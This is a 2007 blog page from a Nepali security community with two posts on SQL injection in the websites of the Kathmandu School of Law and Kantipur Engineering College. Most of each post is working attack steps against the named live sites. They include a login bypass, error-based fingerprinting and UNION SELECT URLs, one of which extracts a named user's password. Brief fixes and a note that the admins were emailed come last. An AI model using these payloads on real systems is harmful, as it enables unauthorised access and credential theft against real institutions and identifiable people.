Do Comment and I shall comment back. Your contributions are always welcome at emailadimn@gmail.com.
Nepali Security Community Accessible at NepSecure Google Groups
Showing posts with label SQL Injection. Show all posts
Showing posts with label SQL Injection. Show all posts

Saturday, September 29, 2007

Kathmandu School of Law website (ksl.edu.np) vulnerable to SQL injection (minor hack)

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Thanks goes to laex8pearl for finding the loophole and mentioning about the website.

Information
The mission page of Kathmandu School of Law promptly states that "It is an emerging legal institution pioneering in the field of imparting quality education and is dedicated to maintain high standards of academic excellence. Its prime objective is to address the need of an academically sound and practically feasible legal education in Nepal."

Level of vulnerability
7/10 since we can extract passwords ^__^

Review of Kathmandu School Of Law Website
Most of the pages are made in asp. The front pages are nothing much interesting in terms of finding security fixes since they have general content. The interesting thing is at the articles section which has dynamic content and dynamic url.

So the login page can be seen at http://www.ksl.edu.np/login.asp

SQL Injection In Detail
It starts with testing whether inputs are escaped or not, well not in this website.
in the login page, enter ' or ' in both username and passwords and we're inside. :-) pretty simple, well nothing interesting inside though, we can post articles but not edit, nothing interesting at all.

To see what database they are using, enter ' garbage in both username and password and well pretty simple error as expected. In case of ksl.edu.np we have this out put

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
Syntax error (missing operator) in query expression 'email='' garbage' and password='' garbage''./login_validate.asp, line 25

Ok so Access Driver, not even a database server, humm a small site, can't expect much.

The real fun comes now, in the login screen we are asked to enter email address and password. That means lets find some already existing users.

On the articles section, there are couple of users listed, lets see if we can find more info on atleast one user.

Ok got it, here is one

nice, it seems he is the directer of ksl, lucky me, lets find his password :-D

For this we will exploit the article display page. Take a look at the url of articles page. Its in the format of http://www.ksl.edu.np/view_article.asp?id=24, for different articles, we have different ids.

Lets test it to get some more result, http://www.ksl.edu.np/view_article.asp?id=24 or id=23 will yeild a different article, humm it seems there is a order by id syntax at the end, i.e., the asp displays the article with least id.

Interensting!!! lets add our own article with id=1, that is minimum, how do we achieve it, its done by SQL union select.

First we need the name of the table, an easy guess article works!!! yeah!!!
http://www.ksl.edu.np/view_article.asp?id=24 union select 1,1 from article

It gives an error, saying this

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.

/view_article.asp, line 56

Interesting thing is UNION select works but the number of columns doesnot match, hit and trial led me to have 8 columns, ie this url works well http://www.ksl.edu.np/view_article.asp?id=24 union select 1,2,3,4,5,6,7,8 from article

Great, the title is in the 5th column and body in the 6th column. What next, lets see if we can find a password of existing user, that should be pretty simple huh??

first we need to guess the table name of table containing passwords, most probable guesses are accounts, users, members, ... in singular and plural forms. Lucky me, its member.

so how do we see the password?? execute this in the url
http://www.ksl.edu.np/view_article.asp?id=24 union select 1,2,3,4,5,(select password from member where email='sangroula@wlink.com.np'),7,8 from article


WORKS GREAT!!! finally a password,

How to remove the SQL Injection in the Kathmandu School Of Law website (ksl.edu.np), its really really simple,
Rule number 1, never trust the users, always sanitize everything you take as input and give output
Rule number 2, never display sql errors, hide them or redirect to say page not found
Rule number 3, use a framework, like drupal or mambo or joomla because these frameworks include community effort of thousands of people and they are really secure.

The admin of http://www.ksl.edu.np has been emailed about this.
SO don't be surprised if this didn't work.
Posted by at 2 comments:
Labels: ,

Tuesday, September 18, 2007

Kantipur Engineering College website Vulnerability to SQL Injection (minor hack)

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Kantipur Engineering College is one of the well known colleges of KTM. It provides undergraduate studies for Bachelor of Engineering in Computer Science, Electronics engineering and other faculties.
Please see their website at here.

Level of vulnerability 1/5
SQL Injection in detail

Most of the pages are static as it seems with no option for url modifications and fiddling with.
The only place to tinker with is at the news section. Which can be seen at the right inside a small column.

The url is as http://www.kec.edu.np/news.php?id=5 . Now this is very lucrative since its so common to just change the id and see what outputs result in.

at id=5 we get


To insert a simple sql we just change the 5 into some text say "asdf" and you will get
Unknown column 'asdf' in 'where clause'
It shows that the query is something like
select * from where id=variablename
and above error is exactly what you get when you insert a string in place of variablename.

what about
http://www.kec.edu.np/news.php?id=news_id
or
http://www.kec.edu.np/news.php?id=1 OR 1=1 or news.news_id=1 order by news.news_title desc


Humm it seems that it executes OK with no error. So we know one of the column names of the table.
Finally with simple human guess, the table should be named news, so doing a simple
http://www.kec.edu.np/news.php?id=news.news_id
and we have all the respective rows in the news table.

These are the fields of the news table
news_id, news_title,
news_date
which is seen by successfully executing this line

http://www.kec.edu.np/news.php?id=1 OR 1=1 or news.news_id=1 order by news.news_title, news.news_date desc

Also, we can do union select. Which means pretty much a lot of thing. But i bet they have anything interesting. The homepage already has nbsp all around the top links, very bad web design.

How to remove the sql injection??
The techniques are widely discussed on various websites.
  • This is a very helpful link on how to prevent sql injections.
    http://www.unixwiz.net/techtips/sql-injection.html#miti
  • Its bad idea to create a website from scratch because there will be lots of places where we would most probably overlook. SQL injection is just one of the many loop holes for hackers to get int our website.
Comments are more than welcome. We hope this helped the original web author of the website to fix his/her flaws.

The admin of http://www.kec.edu.np has been emailed about this.
SO don't be surprised if this didn't work.

Update
the mentioned email admin@kec.wlink.com.np gave a failure email, :-| so even their official email does not work. Somebody please inform the college web admins.
Posted by at 2 comments:
Labels: ,
Subscribe to: Posts (Atom)